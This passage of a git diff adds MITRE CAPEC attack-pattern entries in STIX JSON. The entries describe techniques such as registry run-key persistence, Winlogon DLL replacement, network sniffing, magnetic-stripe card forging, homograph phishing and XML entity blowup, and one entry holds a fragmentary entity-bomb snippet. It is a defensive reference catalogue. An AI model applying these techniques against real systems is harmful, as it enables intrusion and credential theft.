"2019-04-04T00:00:00.000Z", + "name": "Modification of Registry Run Keys", + "description": "An adversary adds a new entry to the \"run keys\" in the registry so that an application of his choosing is executed when a user logs in. In this way, the adversary can get their executable to operate and run on the target system with the authorized user's level of permissions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/270.html", + "external_id": "CAPEC-270" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html", + "external_id": "CWE-15" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Integrity": [ + "Modify Data", + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "An adversary can place a malicious executable (RAT) on the target system and then configure it to automatically run when the user logs in to maintain persistence on the target system.", + "Through the modification of registry \"run keys\" the adversary can masquerade a malicious executable as a legitimate program." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5f36384f-7803-4963-b71a-697210920a84.json b/capec/attack-pattern/attack-pattern--5f36384f-7803-4963-b71a-697210920a84.json new file mode 100644 index 0000000000..197439a4d7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5f36384f-7803-4963-b71a-697210920a84.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--5edcb804-3b10-42b8-ba21-8be798c401ab", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5f36384f-7803-4963-b71a-697210920a84", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Hacking Hardware", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html", + "external_id": "CAPEC-401" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0.json b/capec/attack-pattern/attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0.json new file mode 100644 index 0000000000..5c4f45138a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--0d97de5c-4a3f-4755-897a-82656ee23990", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5f8ede88-b076-472c-b7e3-32b2a56e51e0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Sniffing Attacks", + "description": "In this attack pattern, the adversary intercepts information transmitted between two third parties. The adversary must be able to observe, read, and/or hear the communication traffic, but not necessarily block the communication or change its content. Any transmission medium can theoretically be sniffed if the adversary can examine the contents between the sender and recipient. Sniffing Attacks are similar to Man-In-The-Middle attacks (CAPEC-94), but are entirely passive. MITM attacks are predominantly active and often alter the content of the communications themselves.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/157.html", + "external_id": "CAPEC-157" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_prerequisites": [ + "The target data stream must be transmitted on a medium to which the adversary has access." + ], + "x_capec_resources_required": [ + "The adversary must be able to intercept the transmissions containing the data of interest. Depending on the medium of transmission and the path the data takes between the sender and recipient, the adversary may require special equipment and/or require that this equipment be placed in specific locations (e.g., a network sniffing tool)" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5fb02308-87ad-459d-914e-6b66c082abc0.json b/capec/attack-pattern/attack-pattern--5fb02308-87ad-459d-914e-6b66c082abc0.json new file mode 100644 index 0000000000..4b0ef742c9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5fb02308-87ad-459d-914e-6b66c082abc0.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--374369f2-8c76-430a-986f-9d2a8a9a93a5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5fb02308-87ad-459d-914e-6b66c082abc0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Magnetic Strip Card Brute Force Attacks", + "description": "An attacker analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals. Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks. For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/398.html", + "external_id": "CAPEC-398" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--617ea952-0040-4173-b26a-ade55ed52ed6.json b/capec/attack-pattern/attack-pattern--617ea952-0040-4173-b26a-ade55ed52ed6.json new file mode 100644 index 0000000000..464e243757 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--617ea952-0040-4173-b26a-ade55ed52ed6.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--8e01fefb-e9d7-40c7-bbe0-df5e90cc4d78", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--617ea952-0040-4173-b26a-ade55ed52ed6", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: SOAP Parameter Tampering", + "description": "This attack pattern has been deprecated as its contents have been included in CAPEC-279 : SOAP Manipulation. Please refer to this other pattern going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/280.html", + "external_id": "CAPEC-280" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--619e088f-e6f0-434e-b623-bd257df2b280.json b/capec/attack-pattern/attack-pattern--619e088f-e6f0-434e-b623-bd257df2b280.json new file mode 100644 index 0000000000..ff1778d5ea --- /dev/null +++ b/capec/attack-pattern/attack-pattern--619e088f-e6f0-434e-b623-bd257df2b280.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--3c8f0031-bcf6-4c71-bda0-884f9fad91eb", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--619e088f-e6f0-434e-b623-bd257df2b280", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Hardware Component Substitution", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html", + "external_id": "CAPEC-531" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5.json b/capec/attack-pattern/attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5.json new file mode 100644 index 0000000000..0b48ccfc85 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--927642e6-1010-46b9-ad73-268bfff05266", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--625e9304-f2d8-4578-80bf-ca8532cb3ac5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-15T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Collect Data from Registries", + "description": "An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/647.html", + "external_id": "CAPEC-647" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to read sensitive information about the system in the registry.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have obtained logical access to the system by some means (e.g., via obtained credentials or planting malware on the system).", + "The adversary must have capability to navigate the operating system to peruse the registry." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Once the adversary has logical access (which can potentially require high knowledge and skill level), the adversary needs only the capability and facility to navigate the system through the OS graphical user interface or the command line." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077.json b/capec/attack-pattern/attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077.json new file mode 100644 index 0000000000..1e7333a318 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--e80e3a6e-a9fb-483c-912e-cf231dae0ed5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--62ee09d6-0723-472f-9173-8bd1092cc077", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-05-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Adding a Space to a File Extension", + "description": "An adversary adds a space character to the end of a file extension and takes advantage of an application that does not properly neutralize trailing special elements in file names. This extra space, which can be difficult for a user to notice, affects which default application is used to operate on the file and can be leveraged by the adversary to control execution.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/649.html", + "external_id": "CAPEC-649" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/46.html", + "external_id": "CWE-46" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The use of the file must be controlled by the file extension." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd.json b/capec/attack-pattern/attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd.json new file mode 100644 index 0000000000..36352bf1b1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--11d3735f-216a-449d-852e-82d0b62afa72", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--631027cc-a80a-4768-a4ae-ea7a7484acbd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML External Entities Blowup", + "description": "This attack takes advantage of the entity replacement property of XML where the value of the replacement is a URI. A well-crafted XML document could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/221.html", + "external_id": "CAPEC-221" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/611.html", + "external_id": "CWE-611" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n In this example, the XML parser parses the attacker's XML and opens the malicious URI where the attacker controls the server and writes a massive amount of data to the response stream. In this example the malicious URI is a large file transfer.\n < !DOCTYPE bomb []>&detonate;\n " + ], + "x_capec_prerequisites": [ + "A server that has an implementation that accepts entities containing URI values." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268.json b/capec/attack-pattern/attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268.json new file mode 100644 index 0000000000..77511b384b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--1752dcf6-93c2-4fd1-9542-f6755103abcd", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--6326cb50-e1ee-4029-aab8-0af7efd3a268", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Homograph Attack via Homoglyphs", + "description": "An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/632.html", + "external_id": "CAPEC-632" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homoglyph Attack" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is bankofamerica.com, where the 'a' and 'e' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.\n The user is directed to the adversary's website, which appears as if it is the legitimate bankofamerica.com login page.\n The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user's legitimate bankofamerica.com credentials to log into the user's account and steal any money which may be in the account.\n Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials.See also: CVE-2012-0584 CVE-2009-0652 CVE-2005-0233 CVE-2005-0234 CVE-2005-0235 CVE-2005-0236 CVE-2005-0237 CVE-2005-0238" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL\u2019s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3.json b/capec/attack-pattern/attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3.json new file mode 100644 index 0000000000..44ba25873f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--608fd28b-3fa8-4819-8b27-9fadedddfb2d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Sniffing Network Traffic", + "description": "In this attack pattern, the adversary monitors network traffic between nodes of a public or multicast network in an attempt to capture sensitive information at the protocol level. Network sniffing applications can reveal TCP/IP, DNS, Ethernet, and other low-level network communication information. The adversary takes a passive role in this attack pattern and simply observes and analyzes the traffic. The adversary may precipitate or indirectly influence the content of the observed transaction, but is never the intended recipient of the target information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/158.html", + "external_id": "CAPEC-158" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_prerequisites": [ + "The target must be communicating on a network protocol visible by a network sniffing application.", + "The adversary must obtain a logical position on the network from intercepting target network traffic is possible. Depending on the network topology, traffic sniffing may be simple or challenging. If both the target sender and target recipient are members of a single subnet, the adversary must also be on that subnet in order to see their traffic communication." + ], + "x_capec_resources_required": [ + "A tool with the capability of presenting network communication traffic (e.g., Wireshark, tcpdump, Cain and Abel, etc.)." + ], + "x_capec_skills_required": { + "Low": "Adversaries can obtain and set up open-source network sniffing tools easily." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--63832d3e-2917-48d6-9cdc-118a38e01fcf.json b/capec/attack-pattern/attack-pattern--63832d3e-2917-48d6-9cdc-118a38e01fcf.json new file mode 100644 index 0000000000..42f256b34f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--63832d3e-2917-48d6-9cdc-118a38e01fcf.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--2690c5ef-62e8-4032-a84f-2194d5e9f0e0", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--63832d3e-2917-48d6-9cdc-118a38e01fcf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Replace Winlogon Helper DLL", + "description": "Winlogon is a part of Windows that performs logon actions. In Windows systems prior to Windows Vista, a registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/579.html", + "external_id": "CAPEC-579" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--63878e8b-cc30-4be4-bdeb-6141c8a17187.json b/capec/attack-pattern/attack-pattern--63878e8b-cc30-4be4-bdeb-6141c8a17187.json new file mode 100644 index 0000000000..eee87aceaa --- /dev/null +++ b/capec/attack-pattern/attack-pattern--63878e8b-cc30-4be4-bdeb-6141c8a17187.json @@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--3de0df37-6465-41b1-968f-014e41f66e97", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--63878e8b-cc30-4be4-bdeb-6141c8a17187", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Development Alteration", + "description": "An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system's software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/444.html", + "external_id": "CAPEC-444" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--638c5a6e-24a2-4142-b597-1031aa139b90.json b/capec/attack-pattern/attack-pattern--638c5a6e-24a2-4142-b597-1031aa139b90.json new file mode 100644 index 0000000000..1f9516725a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--638c5a6e-24a2-4142-b597-1031aa139b90.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--843f1897-3094-4605-9787-6745e896846e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--638c5a6e-24a2-4142-b597-1031aa139b90", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Client-Server Protocol Manipulation", + "description": "An adversary takes advantage of weaknesses in the protocol by which a client and server are communicating to perform unexpected actions. Communication protocols are necessary to transfer messages between client and server applications. Moreover, different protocols may be used for different types of interactions. For example, an authentication protocol might be used to establish the identities of the server and client while a separate messaging protocol might be used to exchange data. If there is a weakness in a protocol used by the client and server, an attacker might take advantage of this to perform various types of attacks. For example, if the attacker is able to manipulate an authentication protocol, the attacker may be able spoof other clients or servers. If the attacker is able to manipulate a messaging protocol, the may be able to read sensitive information or modify message contents. This attack is often made easier by the fact that many clients and servers support multiple protocols to perform similar roles. For example, a server might support several different authentication protocols in order to support a wide range of clients, including legacy clients. Some of the older protocols may have vulnerabilities that allow an attacker to manipulate client-server interactions.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/220.html", + "external_id": "CAPEC-220" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html", + "external_id": "CWE-757" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The client and/or server must utilize a protocol that has a weakness allowing manipulation of the interaction." + ], + "x_capec_resources_required": [ + "The adversary must be able to identify the weakness in the utilized protocol and exploit it. This may require a sniffing tool as well as packet creation abilities. The adversary will be aided if they can force the client and/or server to utilize a specific protocol known to contain exploitable weaknesses." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538.json b/capec/attack-pattern/attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538.json new file mode 100644 index 0000000000..7ecc136fda --- /dev/null +++ b/capec/attack-pattern/attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--e476edb0-11e0-45a2-9f54-e96209716a20", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Functionality Misuse", + "description": "An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/212.html", + "external_id": "CAPEC-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack of this kind can compromise the confidentiality of an authorized user's credentials.)", + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ], + "Integrity": [ + "Other (Depending on the adversary's intended technical impact, a successful attack of this kind can compromise any or all elements of the security triad.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary has the capability to interact with the application directly.The target system does not adequately implement safeguards to prevent misuse of authorized actions/processes." + ], + "x_capec_skills_required": { + "Low": "General computer knowledge about how applications are launched, how they interact with input/output, and how they are configured." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--63e85f9e-af96-4531-9303-33107cfb7555.json b/capec/attack-pattern/attack-pattern--63e85f9e-af96-4531-9303-33107cfb7555.json new file mode 100644 index 0000000000..d281d235bf --- /dev/null +++ b/capec/attack-pattern/attack-pattern--63e85f9e-af96-4531-9303-33107cfb7555.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--208d0c9a-9859-4ac8-a040-f023ba1cdfa6", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--63e85f9e-af96-4531-9303-33107cfb7555", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP 